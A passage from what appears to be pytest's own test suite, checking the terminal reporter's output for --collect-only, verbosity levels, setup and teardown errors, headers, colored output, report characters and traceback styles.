    # -v truncates over-long reasons with "..."
    result = pytester.runpytest("-v")
    result.stdout.fnmatch_lines(
        common_output
        + [
            "test_verbose_skip_reason.py::test_long_skip SKIPPED (cannot *...) *",
            "test_verbose_skip_reason.py::test_long_xfail XFAIL (cannot *...) *",
        ]
    )
    # -vv shows the reason in full.
    result = pytester.runpytest("-vv")
    result.stdout.fnmatch_lines(
        common_output
        + [
            (
                "test_verbose_skip_reason.py::test_long_skip SKIPPED"
                " (cannot do foobar because baz is missing due to I don't know what) *"
            ),
            (
                "test_verbose_skip_reason.py::test_long_xfail XFAIL"
                " (cannot do foobar because baz is missing due to I don't know what) *"
            ),
        ]
    )
class TestCollectonly:
    """Terminal output produced by the --collect-only option."""

    def test_collectonly_basic(self, pytester: Pytester) -> None:
        # Collected nodes are rendered as an indented tree of node reprs.
        pytester.makepyfile(
            """
            def test_func():
                pass
            """
        )
        result = pytester.runpytest("--collect-only")
        result.stdout.fnmatch_lines(
            ["<Module test_collectonly_basic.py>", "  <Function test_func>"]
        )

    def test_collectonly_skipped_module(self, pytester: Pytester) -> None:
        # A module-level pytest.skip() (without allow_module_level) is
        # reported as a collection error.
        pytester.makepyfile(
            """
            import pytest
            pytest.skip("hello")
            """
        )
        result = pytester.runpytest("--collect-only", "-rs")
        result.stdout.fnmatch_lines(["*ERROR collecting*"])

    def test_collectonly_displays_test_description(
        self, pytester: Pytester, dummy_yaml_custom_test
    ) -> None:
        """Used dummy_yaml_custom_test for an Item without ``obj``."""
        pytester.makepyfile(
            """
            def test_with_description():
                ''' This test has a description.

                more1.
                more2.'''
            """
        )
        result = pytester.runpytest("--collect-only", "--verbose")
        # The docstring is shown indented below the Function node.
        result.stdout.fnmatch_lines(
            [
                "<YamlFile test1.yaml>",
                "  <YamlItem test1.yaml>",
                "<Module test_collectonly_displays_test_description.py>",
                "  <Function test_with_description>",
                "    This test has a description.",
                "   ",
                "    more1.",
                "    more2.",
            ],
            consecutive=True,
        )

    def test_collectonly_failed_module(self, pytester: Pytester) -> None:
        # An exception at module import time shows up as a collect error.
        pytester.makepyfile("""raise ValueError(0)""")
        result = pytester.runpytest("--collect-only")
        result.stdout.fnmatch_lines(["*raise ValueError*", "*1 error*"])

    def test_collectonly_fatal(self, pytester: Pytester) -> None:
        # A crash inside a collection hook is an INTERNALERROR (ret 3).
        pytester.makeconftest(
            """
            def pytest_collectstart(collector):
                assert 0, "urgs"
            """
        )
        result = pytester.runpytest("--collect-only")
        result.stdout.fnmatch_lines(["*INTERNAL*args*"])
        assert result.ret == 3

    def test_collectonly_simple(self, pytester: Pytester) -> None:
        # Functions, classes and methods all appear in the tree.
        p = pytester.makepyfile(
            """
            def test_func1():
                pass
            class TestClass(object):
                def test_method(self):
                    pass
            """
        )
        result = pytester.runpytest("--collect-only", p)
        # assert stderr.startswith("inserting into sys.path")
        assert result.ret == 0
        result.stdout.fnmatch_lines(
            [
                "*<Module *.py>",
                "* <Function test_func1>",
                "* <Class TestClass>",
                "* <Function test_method>",
            ]
        )

    def test_collectonly_error(self, pytester: Pytester) -> None:
        # Import errors during collection exit with code 2 and show the
        # ImportError in the report.
        p = pytester.makepyfile("import Errlkjqweqwe")
        result = pytester.runpytest("--collect-only", p)
        assert result.ret == 2
        result.stdout.fnmatch_lines(
            textwrap.dedent(
                """\
                *ERROR*
                *ImportError*
                *No module named *Errlk*
                *1 error*
                """
            ).strip()
        )

    def test_collectonly_missing_path(self, pytester: Pytester) -> None:
        """Issue 115: failure in parseargs will cause session not to
        have the items attribute."""
        result = pytester.runpytest("--collect-only", "uhm_missing_path")
        assert result.ret == 4
        result.stderr.fnmatch_lines(
            ["*ERROR: file or directory not found: uhm_missing_path"]
        )

    def test_collectonly_quiet(self, pytester: Pytester) -> None:
        # -q collapses the tree to plain node ids.
        pytester.makepyfile("def test_foo(): pass")
        result = pytester.runpytest("--collect-only", "-q")
        result.stdout.fnmatch_lines(["*test_foo*"])

    def test_collectonly_more_quiet(self, pytester: Pytester) -> None:
        # -qq only shows per-file test counts.
        pytester.makepyfile(test_fun="def test_foo(): pass")
        result = pytester.runpytest("--collect-only", "-qq")
        result.stdout.fnmatch_lines(["*test_fun.py: 1*"])

    def test_collect_only_summary_status(self, pytester: Pytester) -> None:
        """Custom status depending on test selection using -k or -m. #7701."""
        pytester.makepyfile(
            test_collect_foo="""
            def test_foo(): pass
            """,
            test_collect_bar="""
            def test_foobar(): pass
            def test_bar(): pass
            """,
        )
        # Plain collection: singular/plural handled, then selection
        # ratios with -k, then "no tests collected", then error counts.
        result = pytester.runpytest("--collect-only")
        result.stdout.fnmatch_lines("*== 3 tests collected in * ==*")
        result = pytester.runpytest("--collect-only", "test_collect_foo.py")
        result.stdout.fnmatch_lines("*== 1 test collected in * ==*")
        result = pytester.runpytest("--collect-only", "-k", "foo")
        result.stdout.fnmatch_lines("*== 2/3 tests collected (1 deselected) in * ==*")
        result = pytester.runpytest("--collect-only", "-k", "test_bar")
        result.stdout.fnmatch_lines("*== 1/3 tests collected (2 deselected) in * ==*")
        result = pytester.runpytest("--collect-only", "-k", "invalid")
        result.stdout.fnmatch_lines("*== no tests collected (3 deselected) in * ==*")
        pytester.mkdir("no_tests_here")
        result = pytester.runpytest("--collect-only", "no_tests_here")
        result.stdout.fnmatch_lines("*== no tests collected in * ==*")
        pytester.makepyfile(
            test_contains_error="""
            raise RuntimeError
            """,
        )
        result = pytester.runpytest("--collect-only")
        result.stdout.fnmatch_lines("*== 3 tests collected, 1 error in * ==*")
        result = pytester.runpytest("--collect-only", "-k", "foo")
        result.stdout.fnmatch_lines(
            "*== 2/3 tests collected (1 deselected), 1 error in * ==*"
        )
class TestFixtureReporting:
    """Reporting of xunit-style setup/teardown function failures."""

    def test_setup_fixture_error(self, pytester: Pytester) -> None:
        # A failing setup_function is reported as an ERROR (not a
        # failure) and the test body never runs.
        pytester.makepyfile(
            """
            def setup_function(function):
                print("setup func")
                assert 0
            def test_nada():
                pass
            """
        )
        result = pytester.runpytest()
        result.stdout.fnmatch_lines(
            [
                "*ERROR at setup of test_nada*",
                "*setup_function(function):*",
                "*setup func*",
                "*assert 0*",
                "*1 error*",
            ]
        )
        assert result.ret != 0

    def test_teardown_fixture_error(self, pytester: Pytester) -> None:
        # A failing teardown_function yields "1 passed, 1 error": the
        # test itself passed, the teardown error is reported separately.
        pytester.makepyfile(
            """
            def test_nada():
                pass
            def teardown_function(function):
                print("teardown func")
                assert 0
            """
        )
        result = pytester.runpytest()
        result.stdout.fnmatch_lines(
            [
                "*ERROR at teardown*",
                "*teardown_function(function):*",
                "*assert 0*",
                "*Captured stdout*",
                "*teardown func*",
                "*1 passed*1 error*",
            ]
        )

    def test_teardown_fixture_error_and_test_failure(self, pytester: Pytester) -> None:
        # Both the test failure and the teardown error are reported.
        pytester.makepyfile(
            """
            def test_fail():
                assert 0, "failingfunc"
            def teardown_function(function):
                print("teardown func")
                assert False
            """
        )
        result = pytester.runpytest()
        result.stdout.fnmatch_lines(
            [
                "*ERROR at teardown of test_fail*",
                "*teardown_function(function):*",
                "*assert False*",
                "*Captured stdout*",
                "*teardown func*",
                "*test_fail*",
                "*def test_fail():",
                "*failingfunc*",
                "*1 failed*1 error*",
            ]
        )

    def test_setup_teardown_output_and_test_failure(self, pytester: Pytester) -> None:
        """Test for issue #442."""
        # Captured setup and teardown output is replayed in separate
        # sections of the failure report.
        pytester.makepyfile(
            """
            def setup_function(function):
                print("setup func")
            def test_fail():
                assert 0, "failingfunc"
            def teardown_function(function):
                print("teardown func")
            """
        )
        result = pytester.runpytest()
        result.stdout.fnmatch_lines(
            [
                "*test_fail*",
                "*def test_fail():",
                "*failingfunc*",
                "*Captured stdout setup*",
                "*setup func*",
                "*Captured stdout teardown*",
                "*teardown func*",
                "*1 failed*",
            ]
        )
class TestTerminalFunctional:
    """End-to-end checks of the terminal reporter's textual output."""

    def test_deselected(self, pytester: Pytester) -> None:
        # -k deselection is announced in the collection line.
        testpath = pytester.makepyfile(
            """
            def test_one():
                pass
            def test_two():
                pass
            def test_three():
                pass
            """
        )
        result = pytester.runpytest("-k", "test_t", testpath)
        result.stdout.fnmatch_lines(
            ["collected 3 items / 1 deselected / 2 selected", "*test_deselected.py ..*"]
        )
        assert result.ret == 0

    def test_deselected_with_hookwrapper(self, pytester: Pytester) -> None:
        # Deselection performed by a hookwrapper after its yield is still
        # reflected in the collection line and final summary.
        pytester.makeconftest(
            """
            import pytest
            @pytest.hookimpl(hookwrapper=True)
            def pytest_collection_modifyitems(config, items):
                yield
                deselected = items.pop()
                config.hook.pytest_deselected(items=[deselected])
            """
        )
        testpath = pytester.makepyfile(
            """
            def test_one():
                pass
            def test_two():
                pass
            def test_three():
                pass
            """
        )
        result = pytester.runpytest(testpath)
        result.stdout.fnmatch_lines(
            [
                "collected 3 items / 1 deselected / 2 selected",
                "*= 2 passed, 1 deselected in*",
            ]
        )
        assert result.ret == 0

    def test_show_deselected_items_using_markexpr_before_test_execution(
        self, pytester: Pytester
    ) -> None:
        # -m deselection is shown up-front; no stand-alone
        # "1 deselected" section is printed.
        pytester.makepyfile(
            test_show_deselected="""
            import pytest
            @pytest.mark.foo
            def test_foobar():
                pass
            @pytest.mark.bar
            def test_bar():
                pass
            def test_pass():
                pass
            """
        )
        result = pytester.runpytest("-m", "not foo")
        result.stdout.fnmatch_lines(
            [
                "collected 3 items / 1 deselected / 2 selected",
                "*test_show_deselected.py ..*",
                "*= 2 passed, 1 deselected in * =*",
            ]
        )
        result.stdout.no_fnmatch_line("*= 1 deselected =*")
        assert result.ret == 0

    def test_selected_count_with_error(self, pytester: Pytester) -> None:
        # A collection error is counted alongside deselection info and
        # interrupts the session.
        pytester.makepyfile(
            test_selected_count_3="""
            def test_one():
                pass
            def test_two():
                pass
            def test_three():
                pass
            """,
            test_selected_count_error="""
            5/0
            def test_foo():
                pass
            def test_bar():
                pass
            """,
        )
        result = pytester.runpytest("-k", "test_t")
        result.stdout.fnmatch_lines(
            [
                "collected 3 items / 1 error / 1 deselected / 2 selected",
                "* ERROR collecting test_selected_count_error.py *",
            ]
        )
        assert result.ret == ExitCode.INTERRUPTED

    def test_no_skip_summary_if_failure(self, pytester: Pytester) -> None:
        # Without -r flags no skip summary section appears, even though
        # there is a failure.
        pytester.makepyfile(
            """
            import pytest
            def test_ok():
                pass
            def test_fail():
                assert 0
            def test_skip():
                pytest.skip("dontshow")
            """
        )
        result = pytester.runpytest()
        assert result.stdout.str().find("skip test summary") == -1
        assert result.ret == 1

    def test_passes(self, pytester: Pytester) -> None:
        # Progress dots and pass count; run from a changed cwd and
        # restore it afterwards.
        p1 = pytester.makepyfile(
            """
            def test_passes():
                pass
            class TestClass(object):
                def test_method(self):
                    pass
            """
        )
        old = p1.parent
        pytester.chdir()
        try:
            result = pytester.runpytest()
        finally:
            os.chdir(old)
        result.stdout.fnmatch_lines(["test_passes.py ..*", "* 2 pass*"])
        assert result.ret == 0

    def test_header_trailer_info(
        self, monkeypatch: MonkeyPatch, pytester: Pytester, request
    ) -> None:
        # The session header shows platform/version info; a "plugins:"
        # line appears when setuptools plugins are installed.
        monkeypatch.delenv("PYTEST_DISABLE_PLUGIN_AUTOLOAD")
        pytester.makepyfile(
            """
            def test_passes():
                pass
            """
        )
        result = pytester.runpytest()
        verinfo = ".".join(map(str, sys.version_info[:3]))
        result.stdout.fnmatch_lines(
            [
                "*===== test session starts ====*",
                "platform %s -- Python %s*pytest-%s**pluggy-%s"
                % (
                    sys.platform,
                    verinfo,
                    pytest.__version__,
                    pluggy.__version__,
                ),
                "*test_header_trailer_info.py .*",
                "=* 1 passed*in *.[0-9][0-9]s *=",
            ]
        )
        if request.config.pluginmanager.list_plugin_distinfo():
            result.stdout.fnmatch_lines(["plugins: *"])

    def test_no_header_trailer_info(
        self, monkeypatch: MonkeyPatch, pytester: Pytester, request
    ) -> None:
        # --no-header suppresses the platform and plugins lines.
        monkeypatch.delenv("PYTEST_DISABLE_PLUGIN_AUTOLOAD")
        pytester.makepyfile(
            """
            def test_passes():
                pass
            """
        )
        result = pytester.runpytest("--no-header")
        verinfo = ".".join(map(str, sys.version_info[:3]))
        result.stdout.no_fnmatch_line(
            "platform %s -- Python %s*pytest-%s**pluggy-%s"
            % (
                sys.platform,
                verinfo,
                pytest.__version__,
                pluggy.__version__,
            )
        )
        if request.config.pluginmanager.list_plugin_distinfo():
            result.stdout.no_fnmatch_line("plugins: *")

    def test_header(self, pytester: Pytester) -> None:
        # rootdir / configfile / testpaths reporting in the header.
        pytester.path.joinpath("tests").mkdir()
        pytester.path.joinpath("gui").mkdir()
        # no ini file
        result = pytester.runpytest()
        result.stdout.fnmatch_lines(["rootdir: *test_header0"])
        # with configfile
        pytester.makeini("""[pytest]""")
        result = pytester.runpytest()
        result.stdout.fnmatch_lines(["rootdir: *test_header0, configfile: tox.ini"])
        # with testpaths option, and not passing anything in the command-line
        pytester.makeini(
            """
            [pytest]
            testpaths = tests gui
            """
        )
        result = pytester.runpytest()
        result.stdout.fnmatch_lines(
            ["rootdir: *test_header0, configfile: tox.ini, testpaths: tests, gui"]
        )
        # with testpaths option, passing directory in command-line: do not show testpaths then
        result = pytester.runpytest("tests")
        result.stdout.fnmatch_lines(["rootdir: *test_header0, configfile: tox.ini"])

    def test_header_absolute_testpath(
        self, pytester: Pytester, monkeypatch: MonkeyPatch
    ) -> None:
        """Regresstion test for #7814."""
        tests = pytester.path.joinpath("tests")
        tests.mkdir()
        pytester.makepyprojecttoml(
            """
            [tool.pytest.ini_options]
            testpaths = ['{}']
            """.format(
                tests
            )
        )
        result = pytester.runpytest()
        result.stdout.fnmatch_lines(
            [
                "rootdir: *absolute_testpath0, configfile: pyproject.toml, testpaths: {}".format(
                    tests
                )
            ]
        )

    def test_no_header(self, pytester: Pytester) -> None:
        # --no-header also suppresses the rootdir/testpaths line.
        pytester.path.joinpath("tests").mkdir()
        pytester.path.joinpath("gui").mkdir()
        # with testpaths option, and not passing anything in the command-line
        pytester.makeini(
            """
            [pytest]
            testpaths = tests gui
            """
        )
        result = pytester.runpytest("--no-header")
        result.stdout.no_fnmatch_line(
            "rootdir: *test_header0, inifile: tox.ini, testpaths: tests, gui"
        )
        # with testpaths option, passing directory in command-line: do not show testpaths then
        result = pytester.runpytest("tests", "--no-header")
        result.stdout.no_fnmatch_line("rootdir: *test_header0, inifile: tox.ini")

    def test_no_summary(self, pytester: Pytester) -> None:
        # --no-summary suppresses the FAILURES section.
        # NOTE: 'assert false' is a NameError on purpose - it still fails
        # the inner test.
        p1 = pytester.makepyfile(
            """
            def test_no_summary():
                assert false
            """
        )
        result = pytester.runpytest(p1, "--no-summary")
        result.stdout.no_fnmatch_line("*= FAILURES =*")

    def test_showlocals(self, pytester: Pytester) -> None:
        # -l shows local variables in the traceback.
        p1 = pytester.makepyfile(
            """
            def test_showlocals():
                x = 3
                y = "x" * 5000
                assert 0
            """
        )
        result = pytester.runpytest(p1, "-l")
        result.stdout.fnmatch_lines(
            [
                # "_ _ * Locals *",
                "x* = 3",
                "y* = 'xxxxxx*",
            ]
        )

    def test_showlocals_short(self, pytester: Pytester) -> None:
        # -l with --tb=short still lists locals below the source line.
        p1 = pytester.makepyfile(
            """
            def test_showlocals_short():
                x = 3
                y = "xxxx"
                assert 0
            """
        )
        result = pytester.runpytest(p1, "-l", "--tb=short")
        result.stdout.fnmatch_lines(
            [
                "test_showlocals_short.py:*",
                "    assert 0",
                "E   assert 0",
                "        x          = 3",
                "        y          = 'xxxx'",
            ]
        )

    @pytest.fixture
    def verbose_testfile(self, pytester: Pytester) -> Path:
        # Mixed-outcome test file shared by the verbose-reporting tests.
        return pytester.makepyfile(
            """
            import pytest
            def test_fail():
                raise ValueError()
            def test_pass():
                pass
            class TestClass(object):
                def test_skip(self):
                    pytest.skip("hello")
            def test_gen():
                def check(x):
                    assert x == 1
                yield check, 0
            """
        )

    def test_verbose_reporting(self, verbose_testfile, pytester: Pytester) -> None:
        # -v prints one line per test with node id and outcome word.
        result = pytester.runpytest(
            verbose_testfile, "-v", "-Walways::pytest.PytestWarning"
        )
        result.stdout.fnmatch_lines(
            [
                "*test_verbose_reporting.py::test_fail *FAIL*",
                "*test_verbose_reporting.py::test_pass *PASS*",
                "*test_verbose_reporting.py::TestClass::test_skip *SKIP*",
                "*test_verbose_reporting.py::test_gen *XFAIL*",
            ]
        )
        assert result.ret == 1

    def test_verbose_reporting_xdist(
        self,
        verbose_testfile,
        monkeypatch: MonkeyPatch,
        pytester: Pytester,
        pytestconfig,
    ) -> None:
        # Under xdist the outcome is printed before the node id.
        if not pytestconfig.pluginmanager.get_plugin("xdist"):
            pytest.skip("xdist plugin not installed")
        monkeypatch.delenv("PYTEST_DISABLE_PLUGIN_AUTOLOAD")
        result = pytester.runpytest(
            verbose_testfile, "-v", "-n 1", "-Walways::pytest.PytestWarning"
        )
        result.stdout.fnmatch_lines(
            ["*FAIL*test_verbose_reporting_xdist.py::test_fail*"]
        )
        assert result.ret == 1

    def test_quiet_reporting(self, pytester: Pytester) -> None:
        # -q drops the header, file names, and the ==== rulers.
        p1 = pytester.makepyfile("def test_pass(): pass")
        result = pytester.runpytest(p1, "-q")
        s = result.stdout.str()
        assert "test session starts" not in s
        assert p1.name not in s
        assert "===" not in s
        assert "passed" in s

    def test_more_quiet_reporting(self, pytester: Pytester) -> None:
        # -qq additionally drops the "N passed" wording.
        p1 = pytester.makepyfile("def test_pass(): pass")
        result = pytester.runpytest(p1, "-qq")
        s = result.stdout.str()
        assert "test session starts" not in s
        assert p1.name not in s
        assert "===" not in s
        assert "passed" not in s

    @pytest.mark.parametrize(
        "params", [(), ("--collect-only",)], ids=["no-params", "collect-only"]
    )
    def test_report_collectionfinish_hook(self, pytester: Pytester, params) -> None:
        # Lines returned by pytest_report_collectionfinish are printed
        # after "collected N items", also with --collect-only.
        pytester.makeconftest(
            """
            def pytest_report_collectionfinish(config, start_path, items):
                return [f'hello from hook: {len(items)} items']
            """
        )
        pytester.makepyfile(
            """
            import pytest
            @pytest.mark.parametrize('i', range(3))
            def test(i):
                pass
            """
        )
        result = pytester.runpytest(*params)
        result.stdout.fnmatch_lines(["collected 3 items", "hello from hook: 3 items"])

    def test_summary_f_alias(self, pytester: Pytester) -> None:
        """Test that 'f' and 'F' report chars are aliases and don't show up twice in the summary (#6334)"""
        pytester.makepyfile(
            """
            def test():
                assert False
            """
        )
        result = pytester.runpytest("-rfF")
        expected = "FAILED test_summary_f_alias.py::test - assert False"
        result.stdout.fnmatch_lines([expected])
        assert result.stdout.lines.count(expected) == 1

    def test_summary_s_alias(self, pytester: Pytester) -> None:
        """Test that 's' and 'S' report chars are aliases and don't show up twice in the summary"""
        pytester.makepyfile(
            """
            import pytest
            @pytest.mark.skip
            def test():
                pass
            """
        )
        result = pytester.runpytest("-rsS")
        expected = "SKIPPED [1] test_summary_s_alias.py:3: unconditional skip"
        result.stdout.fnmatch_lines([expected])
        assert result.stdout.lines.count(expected) == 1
def test_fail_extra_reporting(pytester: Pytester, monkeypatch) -> None:
    """-rN disables the short summary entirely; the default run shows a
    FAILED line truncated to the terminal width ("...")."""
    monkeypatch.setenv("COLUMNS", "80")
    pytester.makepyfile("def test_this(): assert 0, 'this_failed' * 100")
    suppressed = pytester.runpytest("-rN")
    suppressed.stdout.no_fnmatch_line("*short test summary*")
    default_run = pytester.runpytest()
    default_run.stdout.fnmatch_lines(
        [
            "*test summary*",
            "FAILED test_fail_extra_reporting.py::test_this - AssertionError: this_failedt...",
        ]
    )
def test_fail_reporting_on_pass(pytester: Pytester) -> None:
    """-rf produces no summary section when nothing failed."""
    pytester.makepyfile("def test_this(): assert 1")
    pytester.runpytest("-rf").stdout.no_fnmatch_line("*short test summary*")
def test_pass_extra_reporting(pytester: Pytester) -> None:
    """Passed tests appear in the short summary only when -rp is given."""
    pytester.makepyfile("def test_this(): assert 1")
    default_run = pytester.runpytest()
    default_run.stdout.no_fnmatch_line("*short test summary*")
    rp_run = pytester.runpytest("-rp")
    rp_run.stdout.fnmatch_lines(["*test summary*", "PASS*test_pass_extra_reporting*"])
def test_pass_reporting_on_fail(pytester: Pytester) -> None:
    """-rp produces no summary section when nothing passed."""
    pytester.makepyfile("def test_this(): assert 0")
    pytester.runpytest("-rp").stdout.no_fnmatch_line("*short test summary*")
def test_pass_output_reporting(pytester: Pytester) -> None:
    # Captured output of passing tests is hidden by default; -rP replays
    # it (setup/call/teardown sections) and -rp lists the PASSED lines.
    pytester.makepyfile(
        """
        def setup_module():
            print("setup_module")
        def teardown_module():
            print("teardown_module")
        def test_pass_has_output():
            print("Four score and seven years ago...")
        def test_pass_no_output():
            pass
        """
    )
    result = pytester.runpytest()
    s = result.stdout.str()
    assert "test_pass_has_output" not in s
    assert "Four score and seven years ago..." not in s
    assert "test_pass_no_output" not in s
    result = pytester.runpytest("-rPp")
    result.stdout.fnmatch_lines(
        [
            "*= PASSES =*",
            "*_ test_pass_has_output _*",
            "*- Captured stdout setup -*",
            "setup_module",
            "*- Captured stdout call -*",
            "Four score and seven years ago...",
            "*- Captured stdout teardown -*",
            "teardown_module",
            "*= short test summary info =*",
            "PASSED test_pass_output_reporting.py::test_pass_has_output",
            "PASSED test_pass_output_reporting.py::test_pass_no_output",
            "*= 2 passed in *",
        ]
    )
def test_color_yes(pytester: Pytester, color_mapping) -> None:
    # Full ANSI-colored output, long tb then short tb.  The blank line
    # in the fixture keeps fail() on line 5 / the assert on line 2, as
    # the ":5:"/":2:" expectations below require.
    p1 = pytester.makepyfile(
        """
        def fail():
            assert 0

        def test_this():
            fail()
        """
    )
    result = pytester.runpytest("--color=yes", str(p1))
    result.stdout.fnmatch_lines(
        color_mapping.format_for_fnmatch(
            [
                "{bold}=*= test session starts =*={reset}",
                "collected 1 item",
                "",
                "test_color_yes.py {red}F{reset}{red} * [100%]{reset}",
                "",
                "=*= FAILURES =*=",
                "{red}{bold}_*_ test_this _*_{reset}",
                "",
                "    {kw}def{hl-reset} {function}test_this{hl-reset}():",
                ">       fail()",
                "",
                "{bold}{red}test_color_yes.py{reset}:5: ",
                "_ _ * _ _*",
                "",
                "    {kw}def{hl-reset} {function}fail{hl-reset}():",
                ">       {kw}assert{hl-reset} {number}0{hl-reset}",
                "{bold}{red}E       assert 0{reset}",
                "",
                "{bold}{red}test_color_yes.py{reset}:2: AssertionError",
                "{red}=*= {red}{bold}1 failed{reset}{red} in *s{reset}{red} =*={reset}",
            ]
        )
    )
    # --tb=short: one "file:line: in func" header plus source per frame.
    result = pytester.runpytest("--color=yes", "--tb=short", str(p1))
    result.stdout.fnmatch_lines(
        color_mapping.format_for_fnmatch(
            [
                "{bold}=*= test session starts =*={reset}",
                "collected 1 item",
                "",
                "test_color_yes.py {red}F{reset}{red} * [100%]{reset}",
                "",
                "=*= FAILURES =*=",
                "{red}{bold}_*_ test_this _*_{reset}",
                "{bold}{red}test_color_yes.py{reset}:5: in test_this",
                "    fail()",
                "{bold}{red}test_color_yes.py{reset}:2: in fail",
                "    {kw}assert{hl-reset} {number}0{hl-reset}",
                "{bold}{red}E   assert 0{reset}",
                "{red}=*= {red}{bold}1 failed{reset}{red} in *s{reset}{red} =*={reset}",
            ]
        )
    )
def test_color_no(pytester: Pytester) -> None:
    """--color=no must not emit ANSI escape sequences."""
    pytester.makepyfile("def test_this(): assert 1")
    run = pytester.runpytest("--color=no")
    assert "test session starts" in run.stdout.str()
    run.stdout.no_fnmatch_line("*\x1b[1m*")
@pytest.mark.parametrize("verbose", [True, False])
def test_color_yes_collection_on_non_atty(pytester: Pytester, verbose) -> None:
    """#1397: Skip collect progress report when working on non-terminals."""
    pytester.makepyfile(
        """
        import pytest
        @pytest.mark.parametrize('i', range(10))
        def test_this(i):
            assert 1
        """
    )
    args = ["--color=yes", "-vv"] if verbose else ["--color=yes"]
    result = pytester.runpytest(*args)
    output = result.stdout.str()
    assert "test session starts" in output
    assert "\x1b[1m" in output
    # The incremental "collecting N items" progress must be absent.
    result.stdout.no_fnmatch_line("*collecting 10 items*")
    if verbose:
        assert "collecting ..." in output
    assert "collected 10 items" in output
def test_getreportopt() -> None:
    """getreportopt() normalizes -r report characters: 'a'/'A' expand to
    sets of chars, 'N' resets, and 'w' is implied unless warnings are
    disabled."""
    from _pytest.terminal import _REPORTCHARS_DEFAULT

    class FakeConfig:
        class Option:
            reportchars = _REPORTCHARS_DEFAULT
            disable_warnings = False

        option = Option()

    config = cast(Config, FakeConfig())
    assert _REPORTCHARS_DEFAULT == "fE"
    # Default.
    assert getreportopt(config) == "wfE"
    # With warnings enabled, 'w' is prepended unless already requested.
    for reportchars, expected in [
        ("sf", "wsf"),
        ("sfxw", "sfxw"),
        ("a", "wsxXEf"),
        ("N", "w"),
        ("NwfE", "wfE"),
        ("NfENx", "wx"),
    ]:
        config.option.reportchars = reportchars
        assert getreportopt(config) == expected
    # Now with --disable-warnings: 'w' is stripped / never implied.
    config.option.disable_warnings = True
    for reportchars, expected in [
        ("a", "sxXEf"),
        ("sfx", "sfx"),
        ("sfxw", "sfx"),
        ("a", "sxXEf"),
        ("A", "PpsxXEf"),
        ("AN", ""),
        ("NwfE", "fE"),
    ]:
        config.option.reportchars = reportchars
        assert getreportopt(config) == expected
def test_terminalreporter_reportopt_addopts(pytester: Pytester) -> None:
    """Report chars supplied via addopts in the ini file are visible
    through TerminalReporter.hasopt()."""
    pytester.makeini("[pytest]\naddopts=-rs")
    pytester.makepyfile(
        """
        import pytest
        @pytest.fixture
        def tr(request):
            tr = request.config.pluginmanager.getplugin("terminalreporter")
            return tr
        def test_opt(tr):
            assert tr.hasopt('skipped')
            assert not tr.hasopt('qwe')
        """
    )
    pytester.runpytest().stdout.fnmatch_lines(["*1 passed*"])
def test_tbstyle_short(pytester: Pytester) -> None:
    """--tb=short omits locals; the default (long) style shows them."""
    # The blank line keeps "assert x" on line 8 as expected below.
    p = pytester.makepyfile(
        """
        import pytest

        @pytest.fixture
        def arg(request):
            return 42
        def test_opt(arg):
            x = 0
            assert x
        """
    )
    short_run = pytester.runpytest("--tb=short")
    short_out = short_run.stdout.str()
    assert "arg = 42" not in short_out
    assert "x = 0" not in short_out
    short_run.stdout.fnmatch_lines([f"*{p.name}:8*", "    assert x", "E   assert*"])
    long_out = pytester.runpytest().stdout.str()
    assert "x = 0" in long_out
    assert "assert x" in long_out
def test_traceconfig(pytester: Pytester) -> None:
    """--traceconfig lists active plugins even when nothing is collected."""
    result = pytester.runpytest("--traceconfig")
    assert result.ret == ExitCode.NO_TESTS_COLLECTED
    result.stdout.fnmatch_lines(["*active plugins*"])
class TestGenericReporting:
    """Test class which can be subclassed with a different option provider to
    run e.g. distributed tests."""

    def test_collect_fail(self, pytester: Pytester, option) -> None:
        # Import failures during collection are summarized as errors.
        pytester.makepyfile("import xyz\n")
        result = pytester.runpytest(*option.args)
        result.stdout.fnmatch_lines(
            ["ImportError while importing*", "*No module named *xyz*", "*1 error*"]
        )

    def test_maxfailures(self, pytester: Pytester, option) -> None:
        # --maxfail stops the session and reports why.
        pytester.makepyfile(
            """
            def test_1():
                assert 0
            def test_2():
                assert 0
            def test_3():
                assert 0
            """
        )
        result = pytester.runpytest("--maxfail=2", *option.args)
        result.stdout.fnmatch_lines(
            [
                "*def test_1():*",
                "*def test_2():*",
                "*! stopping after 2 failures !*",
                "*2 failed*",
            ]
        )

    def test_maxfailures_with_interrupted(self, pytester: Pytester) -> None:
        # Both stop reasons are reported when session.shouldstop is set
        # in addition to hitting --maxfail.
        pytester.makepyfile(
            """
            def test(request):
                request.session.shouldstop = "session_interrupted"
                assert 0
            """
        )
        result = pytester.runpytest("--maxfail=1", "-ra")
        result.stdout.fnmatch_lines(
            [
                "*= short test summary info =*",
                "FAILED *",
                "*! stopping after 1 failures !*",
                "*! session_interrupted !*",
                "*= 1 failed in*",
            ]
        )

    def test_tb_option(self, pytester: Pytester, option) -> None:
        # --tb=long shows source of all frames, --tb=short elides the
        # calling frame's source, --tb=no drops the FAILURES section.
        pytester.makepyfile(
            """
            import pytest
            def g():
                raise IndexError
            def test_func():
                print(6*7)
                g()  # --calling--
            """
        )
        for tbopt in ["long", "short", "no"]:
            print("testing --tb=%s..." % tbopt)
            result = pytester.runpytest("-rN", "--tb=%s" % tbopt)
            s = result.stdout.str()
            if tbopt == "long":
                assert "print(6*7)" in s
            else:
                assert "print(6*7)" not in s
            if tbopt != "no":
                assert "--calling--" in s
                assert "IndexError" in s
            else:
                assert "FAILURES" not in s
                assert "--calling--" not in s
                assert "IndexError" not in s

    def test_tb_crashline(self, pytester: Pytester, option) -> None:
        # --tb=line collapses each failure to a single file:line message.
        p = pytester.makepyfile(
            """
            import pytest
            def g():
                raise IndexError
            def test_func1():
                print(6*7)
                g()  # --calling--
            def test_func2():
                assert 0, "hello"
            """
        )
        result = pytester.runpytest("--tb=line")
        bn = p.name
        result.stdout.fnmatch_lines(
            ["*%s:3: IndexError*" % bn, "*%s:8: AssertionError: hello*" % bn]
        )
        s = result.stdout.str()
        assert "def test_func2" not in s

    def test_pytest_report_header(self, pytester: Pytester, option) -> None:
        # Header lines are gathered from all conftests (rootdir first,
        # then sub-directory conftests).
        pytester.makeconftest(
            """
            def pytest_sessionstart(session):
                session.config._somevalue = 42
            def pytest_report_header(config):
                return "hello: %s" % config._somevalue
            """
        )
        pytester.mkdir("a").joinpath("conftest.py").write_text(
            """
def pytest_report_header(config, start_path):
    return ["line1", str(start_path)]
"""
        )
        result = pytester.runpytest("a")
        result.stdout.fnmatch_lines(["*hello: 42*", "line1", str(pytester.path)])

    def test_show_capture(self, pytester: Pytester) -> None:
        # --show-capture selects which captured streams (stdout, stderr,
        # log) are replayed for a failing test.
        pytester.makepyfile(
            """
            import sys
            import logging
